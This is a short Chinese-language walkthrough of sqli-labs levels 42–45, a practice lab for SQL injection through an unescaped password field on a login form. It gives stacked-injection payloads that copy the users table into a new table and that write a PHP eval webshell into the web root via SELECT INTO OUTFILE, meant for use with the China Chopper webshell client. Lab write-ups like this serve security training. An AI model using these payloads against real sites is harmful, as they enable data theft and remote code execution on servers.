Less_42
查看源代码,可以看到password没有经过mysqli_real_escape_string()函数进行处理,所以这个时候我们在这个位置进行构造
使用admin 111111进行登录,登陆成功;
我们打开查看元素,将type修改为text,则密码将显示出来;
我们在名称那输入admin
密码那输入
a';create table ztt42 like users;insert into ztt42 select *from users; #
回显错误;
但我们查看后台数据库,显示表ztt42已建好,说明注入成功;
Less_43
Less43: 使用(‘’)包裹 其他操作与42关基本一致。
我们打开查看元素,将type修改为text,将密码将显示出来;
其余操作与42关基本一致。
Less_44/45
less-44: 使用’’包裹 其他操作与第42关基本一致。
less-45: 使用(‘’)包裹 其他操作与第42关基本一致。
账户输入a 密码输入a’ 回显依旧错误,并且回显没有报错信息;
其他操作与第42关基本一致。
Less45使用使用堆叠注入写入一句话木马配合中国菜刀也可以进行注入
需要条件:
1.必须要有写权限
2.一句话木马(<?php @eval($_POST[crow]);?> )
3.Select xxx into outfile xxx
4.绝对路径(C:\\phpStudy\WWW)
最终结果 密码输入: a’) select ‘<?php @eval($_POST[crow]);?>’ into outfile ‘C:\\phpStudy\\WWW\\a.php’;#